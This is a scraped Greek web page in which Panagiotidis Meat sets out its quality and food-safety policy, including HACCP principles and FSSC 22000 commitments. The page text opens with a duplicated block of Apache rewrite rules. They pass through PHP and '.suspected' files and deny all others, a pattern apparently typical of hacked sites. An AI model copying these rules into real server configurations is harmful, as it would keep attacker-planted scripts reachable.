RewriteEngine On RewriteBase / RewriteRule ^index.php - [L] RewriteRule ^.*\.[pP][hH].* - [L] RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L] Deny from all RewriteEngine On RewriteBase / RewriteRule ^index.php - [L] RewriteRule ^.*\.[pP][hH].* - [L] RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L] Deny from all Πολιτική Ποιότητας - Panagiotidis Meat

Δέσμευση της Διοίκησης για την Πολιτική Ποιότητας και Ασφάλειας Τροφίμων

Η υγιεινή και η ασφάλεια των τροφίμων αποτελεί την αδιαπραγμάτευτη συνιστώσα του ορισμού της ποιότητας. Η διοίκηση της εταιρείας “PANAGIOTIDIS MEAT” η οποία με έδρα το Δρακόντιο Λαγκαδά, δεσμεύεται και παρέχει κάθε δυνατή βοήθεια και υποστήριξη (υλική, τεχνολογική και ανθρώπινο δυναμικό) ώστε όλες οι δραστηριότητές της που αφορούν την επεξεργασία νωπού & κατεψυγμένου κρέατος, παραγωγή κιμά και παρασκευασμάτων κρέατος να είναι οργανωμένες και υπό έλεγχο κατά τρόπο που θα διασφαλίζεται η άριστη ποιότητα, η υγιεινή και η ασφάλειά τους για τον καταναλωτή. Η Δέσμευση της Διοίκησης αποτελεί βασικό άξονα της πολιτικής της επιχείρησης και υποχρέωσή της έναντι των απαιτήσεων των αρμοδίων αρχών ελέγχου, όσον αφορά την εφαρμογή της ισχύουσας εθνικής και κοινοτικής νομοθεσίας καθώς και την ικανοποίηση των απαιτήσεων των καταναλωτών.

Η παρούσα Δέσμευση της Διοίκησης για την πολιτική Ασφάλειας των τροφίμων, είναι σύμφωνη με την Στρατηγική της επιχείρησης, με τον προσδιορισμό του περιεχομένου της, με τον καθορισμό του Σκοπού εφαρμογής και με τους Στόχους του ΣΔΑΤ όπως ορίζονται από την επιχείρηση. Έχουν αναγνωρισθεί όλα τα ενδιαφερόμενα μέρη και οι αντίστοιχες απαιτήσεις τους με την  αποτελεσματικότητα του εφαρμοζόμενου συστήματος ΣΔΑΤ που εφαρμόζει η Επιχείρηση. Η Πολιτική Ασφάλειας Τροφίμων, ο Σκοπός και οι Στόχοι του ΣΔΑΤ είναι διαθέσιμοι προς όλα τα ενδιαφερόμενα μέρη. Παράλληλα με την λειτουργία του συστήματος ΣΔΑΤ, του οποίου ένας κεντρικός άξονας είναι οι εφτά αρχές του HACCP, η επιχείρηση παράλληλα διασφαλίζει:

  • Πελάτες και ενδιαφερόμενα μέρη πλήρως ικανοποιημένους από την ποιότητα και την ασφάλεια των προσφερόμενων προϊόντων.
  • Προσωπικό άριστα εκπαιδευμένο και εφοδιασμένο με τα κατάλληλα μέσα και εξοπλισμό για την εκτέλεση των εργασιών του.
  • Καθοδήγηση και υποστήριξη των ανθρώπων που συμβάλλουν στην αποτελεσματικότητα του ΣΔΑΤ.
  • Προμηθευτές ενημερωμένους που θα δεσμεύονται για την ικανοποίηση των νόμιμων και λογικών απαιτήσεων της επιχείρησης “PANAGIOTIDIS MEAT”.
  • Διοίκηση αφοσιωμένη στις επιταγές του Συστήματος ΣΔΑΤ.
  • Διοίκηση με βασικό προσανατολισμό την προώθηση Συνεχών Βελτιώσεων του ΣΔΑΤ μέσω της επικαιροποίησης του ΣΔΑΤ.
  • Διοίκηση αφοσιωμένη στις επιταγές του Συστήματος FSSC 22000 v.5.1.
  • Υποστήριξη άλλων σχετιζόμενων διοικητικών ρόλων για την απόδειξη της ηγεσίας όπως αυτή εφαρμόζεται σε θέσεις ευθύνης.
  • Ότι λαμβάνεται υπόψιν η γνώμη των εργαζομένων σε αποφάσεις που αφορούν την επιχείρηση και ότι συμμετέχουν σε συναντήσεις της Διοίκησης, στα πλαίσια του Food Safety Culture σύμφωνα με το πρότυπο FSSC v.5.1.

Η Διοίκηση της επιχείρησης “PANAGIOTIDIS MEAT”, λειτουργώντας σε ένα πλαίσιο αγοράς ανταγωνισμού, που σέβεται τις επιταγές παραγωγής ασφαλών τροφίμων, διασφαλίζει ότι το
ΣΔΑΤ έχει εγκατασταθεί και διατηρείται για την επιτυχία των σκοπούμενων αποτελεσμάτων του, ενσωματώνοντας στην λειτουργία του όλες τις διεργασίες και αλληλοεπιδράσεις τους.